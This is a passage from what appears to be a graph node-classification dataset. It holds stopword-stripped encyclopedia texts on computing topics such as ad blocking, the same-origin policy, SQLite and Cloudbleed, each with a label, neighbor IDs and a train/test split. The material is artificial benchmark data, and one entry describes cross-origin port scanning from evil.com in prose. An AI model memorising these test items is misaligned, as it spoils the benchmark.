user trying view users interested making purchases blocking ads also save time ad appears website exerts toll user attention budget since ad enters user field view must either consciously ignored closed dealt way user strongly focused reading solely content seeking likely desire diverted advertisements seek sell unneeded unwanted goods services contrast users actively seeking items purchase might appreciate advertising particular targeted ads another important aspect improving security online advertising subjects users higher risk infecting devices computer viruses surfing pornography websites high-profile case malware distributed advertisements provided youtube malicious customer google doubleclick august 2015 0-day exploit firefox browser discovered advertisement website forbes required users disable ad blocking viewing website users immediately served pop-under malware australian signals directorate recommends individuals organizations block advertisements improve information security posture mitigate potential malvertising attacks machine compromise information security firm webroot also note employing ad blockers provide effective countermeasures malvertising campaigns less technically-sophisticated computer users ad blocking also save money user user personal time worth one dollar per minute unsolicited advertising adds extra minute time user requires reading webpage i.e user must manually identify ads ads click close use techniques either deal tax user intellectual focus way user effectively lost one dollar time order deal ads might generate fractional pennies display-ad revenue website owner problem lost time rapidly spiral control malware accompanies ads ad blocking also reduces page load time saves bandwidth users users pay total transferred bandwidth capped pay-for-usage connections including mobile users worldwide direct financial benefit filtering ad loaded analysis 200 popular news sites ranked alexa 2015 showed mozilla firefox tracking protection lead 39 reduction data usage 44 median reduction page load time according research performed new york times ad blockers reduced data consumption sped load time half 50 news sites including journalists concluded visiting home page boston.com site ad data study every day month would cost equivalent 9.50 data usage ads streaming audio video even presented user interface rapidly consume gigabytes transfer especially faster 4g connection even fixed connections often subject usage limits especially faster connections 100mbit/s quickly saturate network filled streaming media known problem web browsers including firefox restoring sessions often plays multiple embedded ads however annoyance easily averted simply setting web browser clear cookies browsing-history information time browser software closed another preventive option use script blocker enables user disable scripts selectively re-enable certain scripts desired order determine role script user thus quickly learn scripts truly necessary standpoint webpage functionality consequently sources scripts undesirable insight helpful visiting websites general thus precisely controlling scripts run webpage viewed user retains full control happens his/her computer cpu computer screen use mobile desktop ad blocking software designed remove traditional advertising grew 41 worldwide 48 u.s. q2 2014 q2 2015 q2 2015 45 million americans using ad blockers survey research study released q2 2016 metafacts reported 72 million americans 12.8 million adults uk 13.2 million adults france using ad blockers pcs smartphones tablet computers march 2016 internet advertising bureau reported uk adblocking already 22 among people 18 years old one method filtering simply block prevent autoplay flash animation image loading microsoft windows audio video files done browsers easily also improves security privacy crude technological method refined numerous browser extensions every web browser handles task differently general one alters options preferences application extensions filter specific media types additional add-on usually required differentiate ads non-ads using technology wanted unwanted ads behaviors advanced ad blocking filter software allow fine-grained control advertisements features blacklists whitelists regular expression filters certain security features also effect disabling ads antivirus software act ad blocker filtering intermediaries isp providers national governments increasingly common 2015 many web browsers block unsolicited pop-up ads automatically current versions konqueror internet explorer also include content filtering support content filtering added firefox chromium-based browsers opera safari browsers extensions adblock adblock plus ublock origin number sources provide regularly updated filter lists adblock plus provided german software house eyeo gmbh included freeware browser maxthon people republic china default another method filtering advertisements uses cascading style sheets css rules hide specific html xhtml elements beginning 2018 google confirmed built-in ad blocker chrome/chromium browsers would go live 15th february ad blocker blocks certain ads specified better ads standard defined coalition better ads® google board member built-in ad blocking mechanism disputed could unfairly benefit google advertising number external software applications offer ad filtering primary additional feature traditional solution customize http proxy web proxy filter content programs work caching filtering content displayed user browser provides opportunity remove ads also content may offensive inappropriate even malicious drive-by download popular proxy software blocks content effectively include netnanny privoxy squid content-control software main advantage method freedom implementation limitations browser working techniques centralization control proxy used many users proxies good filtering ads several limitations compared browser-based solutions proxies difficult filter transport layer security ssl codice_1 traffic full webpage context available filter well proxies find difficult filter javascript-generated ad content operating systems even aware domain name system dns still offer backward compatibility locally administered list foreign hosts configuration historical reasons stored flat text file default contains hostnames associated ip addresses editing hosts file simple effective dns clients read local hosts file querying remote dns server storing black-hole entries hosts file prevents browser accessing ad server manipulating name resolution ad server local nonexistent ip address codice_2 codice_3 typically used ipv4 addresses simple implement methods circumvented advertisers either hard-coding ip address server hosts ads turn worked around changing local routing table using example iptables blocking firewalls loading advertisements server serves main content blocking name resolution server would also block useful content site using dns sinkhole manipulating hosts file exploits fact operating systems store file ip address domain name pairs consulted browsers using dns server look domain name assigning loopback address known ad server user directs traffic intended reach ad server local machine virtual black hole /dev/null bit bucket advertising blocked using dns server configured block access domains hostnames known serve ads spoofing address users choose use already modified dns server set dedicated device raspberry pi manipulating dns widely employed method manipulate end user sees internet also deployed locally personal purposes china runs root dns eu considered google required google public dns used applications android devices accordingly dns addresses domains used advertising may extremely vulnerable broad form ad substitution whereby domain serves ads entirely swapped one serving local ads subset users especially likely countries notably russia india china advertisers often refuse pay clicks page views dns-level blocking domains non-commercial reasons already common china android apps run local vpn connection host filtering ability dns address without requiring root access approach allows adblocking app download adblocking host files use filter ad networks throughout device blokada dns66 adguard popular apps accomplish adblocking without root permission adblocking active local vpn turned completely stops vpn connection disconnected convenience makes easy access content blocked anti-adblock scripts approach optimizes battery usage reduces internet slowdown caused using external dns vpn adblocking needs overall less configuration devices adtrap use hardware block internet advertising based reviews adtrap device uses linux kernel running version privproxy block ads video streaming music streaming web browser another solution provided network-level ad blocking telcos israeli startup shine internet providers especially mobile operators frequently offer proxies designed reduce network traffic even targeted specifically ad filtering proxy-based arrangements block many types advertisements large bandwidth-consuming otherwise deemed unsuited specific internet connection target device many internet operators block form advertisements time injecting ads promoting services specials content providers argued widespread ad blocking results decreased revenue website sustained advertisements e-commerce-based businesses blocking detected argued since advertisers ultimately paying ads increase revenues eliminating ad blocking would dilute value per impression drive price advertising arguing like click fraud impressions served users use ad blockers little value advertisers consequently argue eliminating ad blocking would increase overall ad revenue content providers long run websites taken countermeasures ad blocking software attempting detect presence ad blockers informing users views outright preventing users accessing content unless disable ad blocking software whitelist website buy ad-removal pass several arguments supporting opposing assertion blocking ads wrong publisher companies taken steps protect rights conduct business according prevailing law suggested european union practice websites scanning ad blocking software may run afoul e-privacy directive claim validated iab europe guidelines released june 2016 stating indeed may legal issue ad blocker detection anti-blocking stakeholders tried refute seems safe assume publishers follow guidelines provided main publisher lobby iab joint effort announced iab sweden prior iab europe guideline matter never materialized would likely found european anti-competition laws august 2017 vendor counter-measures issued demand section 1201 u.s. digital millennium copyright act demand removal domain name associated service ad-blocking filter list vendor argued domain constituted component technological protection measure designed protect copyrighted work thus made violation anti-circumvention law frustrate access 2015 advertisers marketers look involve brands directly entertainment native advertising product placement also known brand integration embedded marketing example product placement would soft drink manufacturer pay reality tv show producer show cast host appear onscreen holding cans soft drink another common product placement automotive manufacturer give free cars producers tv show return show producer depicting characters using vehicles show digital publications turned customers help example guardian asking readers donations help offset falling advertising revenue according newspaper editor-in-chief katharine viner newspaper gets amount money membership paying readers advertising newspaper considered preventing readers accessing content usage ad-blocking software becomes widespread far keeps content accessible readers employ ad-blockers",
    "neighbors": [
      2945,
      2182,
      3462,
      5254,
      7304,
      6797,
      5524,
      10270,
      8224,
      3490,
      2213,
      6186,
      1708,
      7983,
      6576,
      2611,
      9908,
      823,
      11319,
      1849,
      3643,
      2108,
      444,
      7739,
      8639,
      11461,
      2887,
      10057,
      7885,
      4310,
      5078,
      6747,
      8923,
      1501,
      8413,
      735,
      3555,
      1642,
      877,
      6513,
      9713,
      5363,
      4725,
      7669,
      10872,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 5537,
    "label": 9,
    "text": "Method_chaining:method chaining method chaining also known named parameter idiom common syntax invoking multiple method calls object-oriented programming languages method returns object allowing calls chained together single statement without requiring variables store intermediate results local variable declarations syntactic sugar method chaining eliminates extra variable intermediate step developer saved cognitive burden naming variable keeping variable mind method chaining referred producing train wreck due increase number methods come one another line occurs methods chained together similar syntax method cascading method call expression evaluates current object return value method cascading implemented using method chaining method return current object cascading key technique fluent interfaces since chaining widely implemented object-oriented languages cascading n't form cascading-by-chaining returning often referred simply chaining chaining cascading come smalltalk language chaining syntax semantic consequences namely requires methods return object implementing cascading via chaining must current object prevents return value used purpose returning error value common example iostream c++ example codice_1 returns left object allowing chaining compare equivalent another example javascript uses built-in methods array",
    "neighbors": [
      5059,
      10435,
      3462,
      7175,
      9416,
      9225,
      1034,
      333,
      9871,
      337,
      8499,
      3990,
      1210,
      2011
    ],
    "mask": "None"
  },
  {
    "node_id": 5538,
    "label": 3,
    "text": "Vampire_Killer:vampire killer vampire killer platform-adventure video game released konami msx2 computer october 30 1986 parallel version original castlevania debuted month earlier famicom disk system japanese title however msx2 version localized first europe thus published without castlevania branding franchise would start using abroad 1987 nes version released north america neither vampire killer msx2 platform released like castlevania player controls vampire hunter simon belmont ventures dracula castle armed mystical whip inherited father order slay evil count vampire killer shares premise soundtrack characters locations original castlevania structure game play mechanics differ significantly nes counterpart like castlevania vampire killer consists 18 stages boss encounter end every third stage contrast linear level designs castlevania vampire killer features labyrinth-like stages requiring player seek exit next stage also skeleton key required unlock due hardware limitations msx2 vampire killer uses flip screens instead scrolling game played keyboard game controller items weapons obtained breaking candle stands certain walls like nes version also purchasing merchants hidden throughout castle unlocking treasure chests using keys simon default whip also replaced one four weapons chain whip throwing daggers ax cross latter two function like boomerang must retrieved return path player wishes preserve also four items simon carry similar sub-weapons nes version map shows current position location exit used three times pressing f2 holy water used jumping pressing left right mid-air hourglass temporarily paralyzes enemies pressing jumping one two types shields heart points used ammunition holy water hourglass requiring five hearts per use also currency merchants items provide auxiliary effects increasing decreasing prices items sold merchants temporary invulnerability increased walking speed jumping height health recovery defeating boss simon start next stage without previously-accumulated equipment aside number hearts map used already player starts game three lives way gain extra lives continues unless game played game master cartridge second slot playing game master also enable option select stage number lives start well ability skip screens",
    "neighbors": [
      8819,
      11380,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5539,
    "label": 4,
    "text": "Hi-Tech_Crime_Enquiry_Cell:hi-tech crime enquiry cell hi-tech crime enquiry cell special unit kerala police kerala india began operations 5 may 2006 formed prevent detect defend serious organized high technology crimes unit organized purpose prevent investigate prosecute computer related crimes working government agencies private sector academic institutions foreign counterparts",
    "neighbors": [
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 5540,
    "label": 4,
    "text": "HackTool.Win32.HackAV:hacktool.win32.hackav hacktool.win32.hackav not-a-virus keygen hacktool win32/keygen microsoft malware protection center definition kaspersky labs program designed assist hacking programs often contain signatures potential malware dangerous interfere work pc used hacker get personal information user computer according microsoft malware protection center first known detection goes back july 16 2009 riskware able create license keys illegally downloaded non-registered software kind tool may appear differently depending software tool designed create key following security threats often found pcs related tools",
    "neighbors": [
      7809,
      8,
      1417,
      1994,
      1992,
      10574,
      9055,
      7515,
      4956,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5541,
    "label": 3,
    "text": "Zen_2:zen 2 zen 2 codename successor amd zen zen+ microarchitectures due fabricated 7 nanometer node tsmc product sampling planned late 2018 followed commercial release july 2019 powering third generation ryzen processors known ryzen 3000 mainstream desktop chips threadripper 3000 high-end desktop systems computex 2019 amd announced product release date july 7 2019 zen 2 expected bring increase instructions per clock zen nearly large jump excavator zen according userbenchmark.com translates 13 ipc uplift zen+ 2018 consumer electronics show ces amd confirmed zen 2 design complete however release announced 2018 leading analysts predict 2019 release date zen 2 planned include hardware mitigations spectre security vulnerability zen 2-based epyc server cpus codename rome use design multiple cpu dies eight total manufactured 7 nm process chiplets combined 14 nm i/o die mcm package 64 physical cores 128 total compute threads simultaneous multithreading supported per socket 2019 ces amd showed ryzen third-generation engineering sample contains one chiplet eight cores 16 threads lisa su also said expect eight cores final lineup computex 2019 amd revealed zen 2 matisse chips would feature 12 cores weeks later 16 core chip also revealed e3 2019 zen 2 significant departure physical design paradigm amd previous zen architectures zen zen+ zen 2 moves multi-chip module design i/o components cpu laid separate die separation benefits scalability manufacturability physical interfaces n't scale well shrinks process technology separation different die allows components manufactured using larger mature process node cpu dies cpu dies referred amd compact due move i/o components onto another die manufactured using smaller process fewer manufacturing defects larger monolithic die would exhibit addition central i/o die service multiple chiplets making easier construct processors large number cores zen 2 cpu chiplet houses 8 cores arranged two ccx 4 cores chiplets manufactured using tsmc 7 nanometer node 74 80 mm size chiplet 3.9 billion transistors 12 nm iod ~125 mm 2.09 billion transistors amount l3 cache doubled 32 mib core 8-core chiplet access 4 mib l3 compared 2 mib zen zen+ avx2 fully supported increase execution unit width 128-bit 256-bit multiple variants i/o die one manufactured globalfoundries 14 nanometer process another manufactured using company 12 nanometer process 14 nanometer dies features used epyc rome processors whereas 12 nm versions used consumer processors may 26 2019 amd announced six zen 2 based desktop processors included 6-core 8-core variants ryzen 5 ryzen 7 product lines well new ryzen 9 line includes company first 12-core 16-core mainstream desktop processors amd 2nd generation epyc processors known rome features 64 cores launched august 7 2019",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      6151,
      8327,
      10375,
      5645,
      398,
      7963,
      2719,
      11047,
      1322,
      2094,
      1329,
      7218,
      10675,
      833,
      6978,
      7234,
      9541,
      11080,
      2764,
      7247,
      473,
      9435,
      7783,
      1260,
      1005,
      5356,
      9964,
      1137,
      2549,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 5542,
    "label": 4,
    "text": "XOFTspy_Portable_Anti-Spyware:xoftspy portable anti-spyware xoftspy portable anti-spyware proprietary application developed paretologic inc. microsoft windows computers anti-spyware program designed run usb drive protect users malicious threats software free download scan user must purchase license clean license valid clean multiple computers u3 usb drive portability useful situations computer heavily infected bogged sluggish accessing computer directly u3 device xoftspy portable removes malware items regardless computer infected unable download anti-spyware programs online xoftspy retired new product name digitalcare",
    "neighbors": [
      7983,
      6786,
      6797,
      2151
    ],
    "mask": "Test"
  },
  {
    "node_id": 5543,
    "label": 4,
    "text": "Same-origin_policy:same-origin policy computing same-origin policy important concept web application security model policy web browser permits scripts contained first web page access data second web page web pages origin origin defined combination uri scheme host name port number policy prevents malicious script one page obtaining access sensitive data another web page page document object model mechanism bears particular significance modern web applications extensively depend http cookies maintain authenticated user sessions servers act based http cookie information reveal sensitive information take state-changing actions strict separation content provided unrelated sites must maintained client-side prevent loss data confidentiality integrity important remember same-origin policy applies scripts means resources images css dynamically-loaded scripts accessed across origins via corresponding html tags fonts notable exception cross site request forgery attacks take advantage fact origin policy apply html tags concept same-origin policy dates back netscape navigator 2 1995 policy originally designed protect access document object model since broadened protect sensitive parts global javascript object modern browsers implement form same-origin policy important security cornerstone policies required match exact specification often extended define roughly compatible security boundaries web technologies microsoft silverlight adobe flash adobe acrobat mechanisms direct dom manipulation xmlhttprequest algorithm used calculate origin uri specified rfc 6454 section 4 absolute uris origin triple protocol host port uri use hierarchical element naming authority see section 3.2 uri absolute uri globally unique identifier used two resources considered origin values exactly illustrate following table gives overview typical outcomes checks url nowiki http //www.example.com/dir/page.html /nowiki unlike browsers internet explorer include port calculation origin using security zone place same-origin policy helps protect sites use authenticated sessions following example illustrates potential security risk could arise without same-origin policy assume user visiting banking website n't log user goes another site malicious javascript code running background requests data banking site user still logged banking site malicious code could anything user could banking site example could get list user last transactions create new transaction etc browser send receive session cookies banking site based domain banking site user visiting malicious site would expect site visiting access banking session cookie true javascript direct access banking session cookie could still send receive requests banking site banking site session cookie script essentially user would even csrf protections banking site would effective circumstances same-origin policy restrictive posing problems large websites use multiple subdomains first number workarounds using fragment identifier codice_1 property used pass data documents residing different domains modern browsers support multiple techniques relaxing same-origin policy controlled manner two windows frames contain scripts set domain value same-origin policy relaxed two windows window interact example cooperating scripts documents loaded orders.example.com catalog.example.com might set document.domain properties “ example.com ” thereby making documents appear origin enabling document read properties setting property implicitly sets port null browsers interpret differently port 80 even unspecified port assure access allowed browser set document.domain property pages technique relaxing same-origin policy standardized name cross-origin resource sharing standard extends http new origin request header new access-control-allow-origin response header allows servers use header explicitly list origins may request file use wildcard allow file requested site browsers firefox 3.5 safari 4 internet explorer 10 use header allow cross-origin http requests xmlhttprequest would otherwise forbidden same-origin policy another technique cross-document messaging allows script one page pass textual messages script another page regardless script origins calling postmessage method window object asynchronously fires onmessage event window triggering user-defined event handlers script one page still directly access methods variables page communicate safely message-passing technique since html script elements allowed retrieve execute content domains page bypass same-origin policy receive json data different domain loading resource returns jsonp payload jsonp payloads consist internal json payload wrapped pre-defined function call script resource loaded browser designated callback function invoked process wrapped json payload modern browsers permit script connect websocket address without applying same-origin policy however recognize websocket uri used insert origin header request indicates origin script requesting connection ensure cross-site security websocket server must compare header data whitelist origins permitted receive reply behavior same-origin checks related mechanisms well-defined number corner cases pseudo-protocols clearly defined host name port associated urls file data etc. historically caused fair number security problems generally undesirable ability locally stored html file access files disk communicate site internet lastly certain types attacks dns rebinding server-side proxies permit host name check partly subverted make possible rogue web pages directly interact sites addresses true canonical origin impact attacks limited specific scenarios since browser still believes interacting attacker site therefore disclose third-party cookies sensitive information attacker even same-origin policy effect without relaxed cross-origin resource sharing certain cross-origin computer attacks performed webrtc used find internal ip address victim attempting connect cross-origin port responses read face same-origin policy javascript still make inferences whether port open closed checking onload/onerror event fires get timeout gives opportunities cross-origin portscanning javascript even fingerprint services cross-origin taking advantage default files example javascript loaded site evil.com attempts open file hxxp //127.0.0.1/images/jenkins.png onload event fires inferred victim runs jenkins computer way attacker find potentially vulnerable services example internal network even face same-origin policy service vulnerable cross-site request forgery even compromised",
    "neighbors": [
      10368,
      7044,
      3462,
      1802,
      7708,
      7965,
      3616,
      2470,
      8615,
      11559,
      4797,
      6209,
      8386,
      5078,
      5724,
      4198,
      9834,
      115,
      2169,
      4095
    ],
    "mask": "Train"
  },
  {
    "node_id": 5544,
    "label": 3,
    "text": "Trailblazer_(video_game):trailblazer video game trailblazer video game requires player direct ball along series suspended passages released originally gremlin graphics zx spectrum commodore 64 atari 8-bit family amstrad cpc c16/plus/4 1986 also enhanced version amstrad cpc 3 disc ported amiga atari st 2005 port gizmondo handheld games console released game played either time trial arcade mode music background matches gameplay electronica genre races quite brief usually last 15 45 seconds special fields track let ball jump slow speed warp speed ball invert controls holes game reviewed 1990 dragon 158 hartley patricia kirk lesser role computers column part mastertronic mega pack 10 games previously released europe reviewers gave game 5 5 stars stating favorite disk racing cosmic causeway roads clock robot one really fun zzap 64 reviewers also enjoyed game thought excellent variation race game theme overall rating given 93 steve panak reviewing atari 8-bit version analog computing concluded game original arcade action wristbuster come pike long time one best two-player competition games 've seen",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5545,
    "label": 4,
    "text": "Sri_Lankan_cyber_security_community:sri lankan cyber security community cyber security information assurance community sri lanka diverse many stakeholders groups contributing support national information cyber security strategy following list stakeholders established information communication technology agency 2006 sri lanka computer emergency response team slcert functions incidentally government private company preview ministry digital infrastructure information technology providing services computer emergency response team finance sector computer security incident response team fincsirt specializes computer security relating banking financial industry sri lanka joint initiative central bank sri lanka slcert sri lankan bankers association national cyber security agency proposed draft cyber security bill techcert formed lk domain registry provides computer security incident response services",
    "neighbors": [
      10190
    ],
    "mask": "None"
  },
  {
    "node_id": 5546,
    "label": 1,
    "text": "SQLite:sqlite sqlite relational database management system rdbms contained c library contrast many database management systems sqlite client–server database engine rather embedded end program sqlite acid-compliant implements sql standard generally following postgresql syntax however sqlite uses dynamically weakly typed sql syntax guarantee domain integrity means one example insert string column defined integer sqlite attempt convert data formats appropriate string 123 integer case guarantee conversions store data as-is conversion possible sqlite popular choice embedded database software local/client storage application software web browsers arguably widely deployed database engine used today several widespread browsers operating systems embedded systems mobile phones among others sqlite bindings many programming languages unlike client–server database management systems sqlite engine standalone processes application program communicates instead sqlite library linked thus becomes integral part application program linking may static dynamic application program uses sqlite functionality simple function calls reduce latency database access function calls within single process efficient inter-process communication sqlite stores entire database definitions tables indices data single cross-platform file host machine implements simple design locking entire database file writing sqlite read operations multitasked though writes performed sequentially due server-less design sqlite applications require less configuration client-server databases sqlite called zero-conf require service management startup scripts access control based grant passwords access control handled means file system permissions given database file databases client-server systems use file system permissions give access database files daemon process another implication serverless design several processes may able write database file server-based databases several writers connect daemon able handle locks internally sqlite hand rely file-system locks less knowledge processes accessing database time therefore sqlite preferred choice write-intensive deployments however simple queries little concurrency sqlite performance profits avoiding overhead passing data another process sqlite uses postgresql reference platform would postgresql used make sense sql standard one major deviation exception primary keys sqlite enforce type checking type value dynamic strictly constrained schema although schema trigger conversion storing conversion potentially reversible sqlite strives follow postel rule d. richard hipp designed sqlite spring 2000 working general dynamics contract united states navy hipp designing software used damage-control system aboard guided missile destroyers originally used hp-ux ibm informix database back-end sqlite began tcl extension design goals sqlite allow program operated without installing database management system requiring database administrator hipp based syntax semantics postgresql 6.5 august 2000 version 1.0 sqlite released storage based gdbm gnu database manager sqlite 2.0 replaced gdbm custom b-tree implementation adding transaction capability sqlite 3.0 partially funded america online added internationalization manifest typing major improvements 2011 hipp announced plans add nosql interface managing documents expressed json sqlite databases develop unqlite embeddable document-oriented database sqlite implements sql-92 standard sql lacks features example partially provides triggers write views however provides instead triggers provide functionality provides complex queries still limited alter table function modify delete columns sqlite uses unusual type system sql-compatible dbms instead assigning type column sql database systems types assigned individual values language terms dynamically typed moreover weakly typed ways perl one insert string integer column although sqlite try convert string integer first column preferred type integer adds flexibility columns especially bound dynamically typed scripting language however technique portable sql products common criticism sqlite type system lacks data integrity mechanism provided statically typed columns products sqlite web site describes strict affinity mode feature yet added however implemented constraints like codice_1 tables normally include hidden rowid index column gives faster access database includes integer primary key column sqlite typically optimize treating alias rowid causing contents stored strictly typed 64-bit signed integer changing behavior somewhat like auto-incrementing column future versions sqlite may include command introspect whether column behavior like rowid differentiate columns weakly-typed non-autoincrementing integer primary keys sqlite full unicode function optional several computer processes threads may access database concurrently several read accesses satisfied parallel write access satisfied accesses currently serviced otherwise write access fails error code automatically retried configurable timeout expires concurrent access situation would change dealing temporary tables restriction relaxed version 3.7 write-ahead logging wal turned enabling concurrent reads writes sqlite version 3.7.4 first saw addition fts4 full text search module features enhancements older fts3 module fts4 allows users perform full text searches documents similar search engines search webpages version 3.8.2 added support creating tables without rowid may provide space performance improvements common table expressions support added sqlite version 3.8.3 2015 json1 extension new subtype interfaces sqlite version 3.9 introduced json content managing sqlite code hosted fossil distributed version control system built upon sqlite database standalone command-line program provided sqlite distribution used create database define tables insert change rows run queries manage sqlite database file also serves example writing applications use sqlite library sqlite uses automated regression testing prior release 2 million tests run part release verification starting august 10 2009 release sqlite 3.6.17 sqlite releases 100 branch test coverage one components code coverage tests test harnesses partially public domain partially proprietary sqlite included default large number programming languages provide bindings sqlite including",
    "neighbors": [
      9729,
      9732,
      5637,
      11269,
      3080,
      6664,
      1034,
      2570,
      2062,
      8718,
      3600,
      8719,
      7700,
      9244,
      9245,
      11294,
      5663,
      8225,
      546,
      1578,
      5165,
      5677,
      9263,
      10286,
      6709,
      1594,
      5691,
      6718,
      6212,
      69,
      8262,
      9286,
      11338,
      4685,
      8781,
      10831,
      3664,
      1112,
      8280,
      603,
      3675,
      8285,
      2658,
      11363,
      9828,
      3176,
      2666,
      3182,
      1135,
      9847,
      5242,
      7292,
      637,
      11391,
      11392,
      1156,
      5764,
      1670,
      9348,
      5768,
      5262,
      10389,
      10393,
      11418,
      7835,
      3229,
      7326,
      673,
      9893,
      8870,
      4777,
      10921,
      4781,
      7341,
      7343,
      10413,
      2225,
      9395,
      692,
      2228,
      1726,
      6850,
      5827,
      196,
      3784,
      5833,
      11466,
      7889,
      2780,
      8413,
      9949,
      10470,
      1255,
      1256,
      8940,
      9454,
      2804,
      2819,
      5892,
      7428,
      9481,
      2828,
      10518,
      280,
      1304,
      1305,
      1816,
      10009,
      10525,
      798,
      11551,
      288,
      2852,
      3876,
      8486,
      10537,
      10026,
      7983,
      5431,
      7991,
      2875,
      3900,
      10045,
      10048,
      6465,
      4423,
      11082,
      332,
      5964,
      8524,
      3409,
      3921,
      8019,
      5467,
      8539,
      864,
      3427,
      3940,
      5475,
      6502,
      10083,
      362,
      8554,
      2413,
      7022,
      10096,
      3442,
      888,
      7548,
      2432,
      11651,
      3462,
      8582,
      8584,
      906,
      9610,
      9101,
      10129,
      5522,
      1427,
      9109,
      2966,
      10645,
      9112,
      10137,
      2970,
      1435,
      2465,
      2978,
      10145,
      11683,
      937,
      6057,
      7595,
      428,
      5549,
      11191,
      5560,
      7608,
      10170,
      10176,
      8644,
      3015,
      5583,
      2001,
      11218,
      9177,
      4058,
      7646,
      6112,
      482,
      1509,
      1516,
      5100,
      5612,
      5613,
      1520,
      8689,
      10737,
      10739,
      5620,
      9205,
      4598,
      11252,
      4601,
      2045,
      6654
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5547,
    "label": 4,
    "text": "Cloudbleed:cloudbleed cloudbleed security bug discovered february 17 2017 affecting cloudflare reverse proxies caused edge servers run past end buffer return memory contained private information http cookies authentication tokens http post bodies sensitive data result data cloudflare customers leaked went cloudflare customers happened server memory particular moment data cached search engines discovery reported google project zero team tavis ormandy posted issue team issue tracker said informed cloudflare problem february 17 proof-of-concept attack got cloudflare server return private messages major dating sites full messages well-known chat service online password manager data frames adult video sites hotel bookings 're talking full https requests client ip addresses full responses cookies passwords keys data everything effects cloudbleed similar 2014 heartbleed bug allowing unauthorized third parties access data memory programs running web servers including data shielded tls extent cloudbleed also could impacted many users heartbleed since affected security content delivery service used close 2 million websites tavis ormandy first discover vulnerability immediately drew comparison heartbleed saying took every ounce strength call issue 'cloudbleed report thursday february 23 2017 cloudflare wrote post noting bug serious leaked memory could contain private information cached search engines also discovered evidence malicious exploits bug reports existence. br greatest period impact february 13 february 18 around 1 every 3,300,000 http requests cloudflare potentially resulting memory leakage ’ 0.00003 requests .cloudflare acknowledged memory could leaked early september 22 2016 company also stated one private keys used machine-to-machine encryption leaked turned underlying bug caused memory leak present ragel-based parser many years memory leaked way internal nginx buffers used introducing cf-html subtly changed buffering enabled leakage even though problems cf-html john graham-cumming cloudflare cto noted cloudflare clients uber okcupid n't directly informed leaks due security risks involved situation “ backdoor communication outside cloudflare — google search engines ” said graham-cumming also said unfortunately ancient piece software contained latent security problem problem showed process migrating away added team already begun testing software possible issues tavis ormandy initially stated really impressed cloudflare quick response dedicated cleaning unfortunate issue however ormandy pressed cloudflare additional information gave several excuses n't make sense sending draft severely downplays risk customers uber stated impact service limited uber spokesperson added handful session tokens involved since changed passwords exposed okcupid ceo elie seidman said cloudflare alerted us last night bug 've looking impact okcupid members initial investigation revealed minimal exposure determine users impacted promptly notify take action protect fitbit representative stated company investigating issue concerned users change passwords immediately many major news outlets advised consumers sites using cloudflare change passwords even accounts protected 2-factor authentication could risk passwords mobile apps could impacted researchers arbor networks alert suggested us truly safe response large-scale information leak update passwords web sites app-related services use every day ... pretty much inc. magazine cybersecurity columnist joseph steinberg however advised people change passwords stating current risk much smaller price paid increased 'cybersecurity fatigue leading much bigger problems future",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      3237,
      9904,
      9395,
      8886,
      3789,
      5325,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      8956,
      2815,
      3843,
      10502,
      10003,
      793,
      2339,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6474,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      10110,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      8677,
      2542,
      507
    ],
    "mask": "Train"
  },
  {
    "node_id": 5548,
    "label": 3,
    "text": "Valis_II:valis ii sd style remake released japanese mega drive north american genesis syd valis like titles series valis ii side-scrolling platform game requires player navigate two-dimensional levels battling enemies jumping ledge ledge running player faces boss end level despite details gameplay varying versions versions share several similar features well mobile remake added new stages alternate costumes weapons time passes vecanti set rule next emperor rogles brother voiced hirotaka suzuoki wishes stamp trace former tyrant point murdering supporters rogles might furthermore bloodthirsty tendencies recognize yuko valis sword viable threats claim throne orders minions eliminate first chance thwart megas falls magical blade peace comes dream world yuko returns home resume otherwise ordinary human life telenet japan developed two main versions valis ii around time pc engine cd-rom² released first later published nec north america home computer version believed entered development earlier released pc-88 pc-98 msx sharp x68000 japan featured graphic cutscenes another port game released mega drive japan sd valis telenet genesis north america renovation products syd valis title features gameplay plot original character design changed super deformed sd style north american version game incorrectly identifies yūko syd reuses box art naritore sugoroku '92 front cover project egg released various emulated versions game windows along 2011 compilation complete plus came soundtrack cd figure pc engine also released sunsoft playstation store 2011 1993 cd valis visual collection contains cutscenes pc engine version valis ii valis ii generally positively received critics review scores pc engine turbografx-16 version included 74 games machine 76 italian edition computer video games 70 génération 4 92 joystick 75 tilt three five stars turboplay whose reviewer impressed game visuals music disappointed perceived low difficulty hand sd valis syd valis rated 36 consoles+ 56 joystick 63 joypad sega force bashed dull gameplay despite great levels enemies predicting even platform addicts play james scullion sega pro gave sd valis mediocre score 65 recommending saving money game retrospectively sebastian sponsel sega-16 scored 2 10 stating syd valis disappointment fans non-fans alike ... ’ like game created joke one producers ’ get released anyway",
    "neighbors": [
      8355,
      11460,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5549,
    "label": 9,
